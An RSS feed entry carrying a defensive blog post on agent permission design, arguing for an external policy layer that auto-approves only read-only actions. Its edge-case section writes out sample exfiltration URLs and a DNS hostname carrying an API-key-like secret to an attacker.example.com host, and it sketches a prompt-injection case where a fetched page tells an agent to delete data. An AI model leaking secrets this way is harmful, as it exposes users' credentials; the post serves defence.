<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Virgil</title>
    <description>The latest articles on DEV Community by Virgil (@virgil22).</description>
    <link>https://dev.to/virgil22</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3882965%2Fbdade190-b4cb-4029-8901-2d2127507d7e.jpeg</url>
      <title>DEV Community: Virgil</title>
      <link>https://dev.to/virgil22</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/virgil22"/>
    <language>en</language>
    <item>
      <title>Agents ask too many questions</title>
      <dc:creator>Virgil</dc:creator>
      <pubDate>Tue, 14 Apr 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/virgil22/agents-ask-too-many-questions-4jnd</link>
      <guid>https://dev.to/virgil22/agents-ask-too-many-questions-4jnd</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvsa0dlkhhuowsbwge5ac.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvsa0dlkhhuowsbwge5ac.png" alt="Abstract digital scene of a glowing blue data stream colliding with a rigid amber geometric filter, illustrating tension between fluid AI processes and structured control systems." width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you’ve used any agent harness for development work - Claude Code, OpenCode, Devin, or one of the many others - you’ve run into this: you’re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.&lt;/p&gt;

&lt;p&gt;The naive fix is to just trust the agent more - expand the allow list, enable auto mode, and move on. But that’s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is “just reading,” it can be manipulated into deciding that almost anything is.&lt;/p&gt;


&lt;div class="crayons-card c-embed"&gt;

  

&lt;p&gt;&lt;strong&gt;The Right Fix:&lt;/strong&gt; Take the decision away from the agent entirely. A policy layer external to the agent must inspect each action against objective criteria—the model’s intent is never consulted.&lt;/p&gt;


&lt;/div&gt;


&lt;h2&gt;
  
  
  Read-only is an objective property
&lt;/h2&gt;

&lt;p&gt;An action is read-only if it observes without modifying. Not “read-only from the agent’s perspective” - objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria - HTTP method, syscall type, file path - and make the call without asking the model what it thinks it’s doing.&lt;/p&gt;

&lt;p&gt;State-changing actions still prompt. Everything else passes automatically.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsjmyt7hbc3t1s4cbv7p.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftsjmyt7hbc3t1s4cbv7p.png" alt="A flowchart showing a policy layer intercepting an agent's action and routing it to auto-approve, prompt, or block based on whether it is read-only and whether it contains secrets." width="370" height="835"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The policy layer evaluates each action against objective criteria - the model’s intent is never consulted.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two edge cases worth taking seriously
&lt;/h2&gt;

&lt;p&gt;A GET request &lt;em&gt;can&lt;/em&gt; exfiltrate data. If an agent is manipulated into appending a secret to a query string - &lt;code&gt;https://example.com/?token=sk-ant-...&lt;/code&gt; - the request is technically read-only but it’s leaking something. The same applies to path segments: &lt;code&gt;https://attacker.example.com/exfil/sk-ant-api03-abc123&lt;/code&gt; is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers - &lt;code&gt;Referer&lt;/code&gt;, &lt;code&gt;User-Agent&lt;/code&gt;, a custom &lt;code&gt;X-Data&lt;/code&gt; header - none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL &lt;em&gt;and&lt;/em&gt; outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.&lt;/p&gt;

&lt;p&gt;DNS-based exfiltration is subtler. The agent resolves &lt;code&gt;sk-ant-api03-abc123.attacker.example.com&lt;/code&gt;. The GET never fires - but the DNS lookup already transmitted the secret to the attacker’s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there’s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.&lt;/p&gt;

&lt;h2&gt;
  
  
  Prompt injection doesn’t break this
&lt;/h2&gt;

&lt;p&gt;The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch - it’s a GET - but now those instructions tell the agent to delete all your data.&lt;/p&gt;

&lt;p&gt;This isn’t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. The model read something bad, but reading bad content doesn’t bypass the enforcement layer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where things stand
&lt;/h2&gt;

&lt;p&gt;Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, “auto mode” flags - these are all variations on the same theme: the harness tries to determine what’s safe by reasoning about the agent’s intent.&lt;/p&gt;

&lt;p&gt;The problem is that intent is opaque and manipulable. A classifier trained to identify “safe” actions can be nudged into misclassifying. A model asked “is this safe?” can be prompted into saying yes. And in practice, these systems are reportedly brittle - auto modes that don’t fire when they should, classifiers that trigger on actions they shouldn’t.&lt;/p&gt;

&lt;p&gt;The missing piece is enforcement that’s external and objective. Not a model deciding what’s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn’t care what the model thinks - it only cares what the action &lt;em&gt;is&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;This isn’t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing - these can be authorized by policy without ever asking the agent. Everything else gets held.&lt;/p&gt;

&lt;h2&gt;
  
  
  For builders and power users
&lt;/h2&gt;

&lt;p&gt;If you’re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.&lt;/p&gt;

&lt;p&gt;If you’re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.&lt;/p&gt;

&lt;p&gt;How are you handling agent permissions today: are you leaning toward auto-approve or manual confirmation? And have you run into the edge cases around secret exfiltration via URL or headers? Let me know in the comments.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://attack.mitre.org/techniques/T1048/003/" rel="noopener noreferrer"&gt;MITRE ATT&amp;amp;CK T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol&lt;/a&gt; - the canonical reference for DNS-based and other alternative-protocol exfiltration.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/gitleaks/gitleaks" rel="noopener noreferrer"&gt;Gitleaks&lt;/a&gt; - the secret-scanning tool referenced in this post. Regex-based pattern matching for API keys, tokens, and credentials.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>devtools</category>
      <category>security</category>
      <category>opinion</category>
    </item>
  </channel>
</rss>
